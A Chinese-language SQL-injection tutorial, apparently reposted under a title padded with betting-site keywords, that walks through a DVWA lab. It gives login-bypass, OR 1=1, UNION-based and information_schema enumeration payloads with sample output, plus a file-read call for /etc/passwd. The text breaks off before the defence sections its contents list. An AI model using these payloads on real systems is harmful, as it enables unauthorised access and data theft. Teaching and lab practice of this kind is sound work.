网安系列【6】之[特殊字符] SQL注入揭秘：从入门到防御实战指南-365bet投注盘口-365bet注册开户-体育网站365-365bet投注盘口

文章目录

一真实案例二 SQL注入三为什么危害堪比核弹？四深入解剖攻击原理🎯 4.1：探测SQL漏洞的存在🎯 4.2：数据库信息探测🎯 4.3：数据库信息探测🎯 4.4：数据库信息进一步探测🎯 4.5：数据库表中敏感信息探测

五防御指南：四重黄金法则🔒5.1 法则1：参数化查询（最有效！）🔒5.2 法则2：输入严格过滤🔒5.3 法则3：最小权限原则🔒5.4 法则4：深度防御策略

六检测：你的网站安全吗？

“比忘记WHERE子句更可怕的，是把用户输入直接当代码执行。” —— 每个被SQL注入毒打过的开发者

一真实案例

场景：某电商网站登录框正常SQL：SELECT * FROM users WHERE username = '输入的用户名' AND password = '输入的密码';

攻击者输入：用户名：admin' -- ，密码：任意值（如123）。最终SQL变形成： sql SELECT * FROM users WHERE username = 'admin' -- ' AND password = '123'

👉 结果：攻击者以admin身份直接登录！因为--在SQL中是注释符，密码验证被直接忽略。

二 SQL注入

通俗解释：黑客通过篡改SQL查询结构，把恶意代码“注入”到正常SQL语句中，欺骗数据库执行非法操作。技术本质：用户输入数据未被正确处理，与代码指令发生混淆，导致数据被当作代码执行。

三为什么危害堪比核弹？

危害类型具体后果真实案例数据窃取盗取用户密码、银行卡信息雅虎5亿账户泄露事件数据篡改修改商品价格、账户余额某电商1元买iPhone漏洞系统接管获取服务器控制权限某政府系统被植入后门数据删除清空整个数据库表某公司用户数据遭恶意删除

四深入解剖攻击原理

以下案例中在DVWA平台low安全水平下进行SQL注入练习。

🎯 4.1：探测SQL漏洞的存在

通过以下的执行结果探测，确定漏洞的存在。

SELECT first_name, last_name FROM users WHERE user_id = '$id';

攻击payload：username = ' OR 1=1 -- 或者username=' or 1=1 # 生成SQL：

SELECT * FROM users WHERE username='' OR 1=1 --;

✅ 攻击效果：条件永真，返回所有用户数据

🎯 4.2：数据库信息探测

判断数据库的列数order by [column_num]

SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#';

SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#';

SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#"

用户输入1' order by 1#，得到返回结果确定数据库表中存在一列，继续增加列数的数值，探测数据表的总列数。如果不存在，会报错 Unknown column '3' in 'order clause' in。用户输入的数据为 1′order by 3#时网页出现报错，证明该数据库表有 2 列/字段

🎯 4.3：数据库信息探测

在确定该接口使用的数据库表的列数之后，可以继续使用union进行获取数据库的更多资源。如，上一步测试的数据库表只有两列。

' UNION SELECT user(),database() #

✅ 攻击效果：暴漏当前连接数据库的用户和数据库名

ID: ' UNION SELECT user(),database() #

First name: dvwa_ZfhAQF@172.18.0.3

Surname: dvwa_xmxbmd

常用信息收集函数：

系统信息函数

@@version 或 version(): 数据库版本。

@@basedir: MySQL安装的基本目录。

@@datadir: 数据文件存储目录。

@@hostname: 服务器主机名。

@@version_compile_os: 操作系统信息。

数据库信息函数

schema(): 同database()，返回当前数据库名。

table_schema (通过information_schema.tables): 获取所有数据库名。

用户信息函数

current_user(): 当前用户。

system_user(): 系统用户。

session_user(): 会话用户。

文件和路径函数

load_file('/etc/passwd'): 读取文件内容（需要权限）。

@@tmpdir: 临时目录。

@@secure_file_priv: 安全文件目录。

其他实用函数

UUID(): 返回一个通用唯一标识符。

connection_id(): 当前连接的ID。

last_insert_id(): 最后插入的自动增量值。

row_count(): 上一个语句影响的行数。

🎯 4.4：数据库信息进一步探测

information_schema是Mysql5.0后新增的元信息数据库，保存Mysql服务器所保存的所有的其他数据库信息，如schemata（数据库信息）、tables（表信息）、columns（列信息）。联合查询表(查询数据的名称和表的名称);

union select table_name,table_schema from information_schema.tables where table_schema='[database_name]'

SELECT first _name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#';

结合上一步获取到的数据库名dvwa_xmxbmd和使用的表只有两列，可以采用以下语句进行执行，查询目前数据库中的表。

' union select table_name,table_schema from information_schema.tables where table_schema='dvwa_xmxbmd' #

ID: ' union select table_name,table_schema from information_schema.tables where table_schema='dvwa_xmxbmd' #

First name: guestbook

Surname: dvwa_xmxbmd

ID: ' union select table_name,table_schema from information_schema.tables where table_schema='dvwa_xmxbmd' #

First name: users

Surname: dvwa_xmxbmd

继续查看具有意义的users表中的列信息，执行以下输入

1' union select column_name,data_type from information_schema.columns where table_name='users' #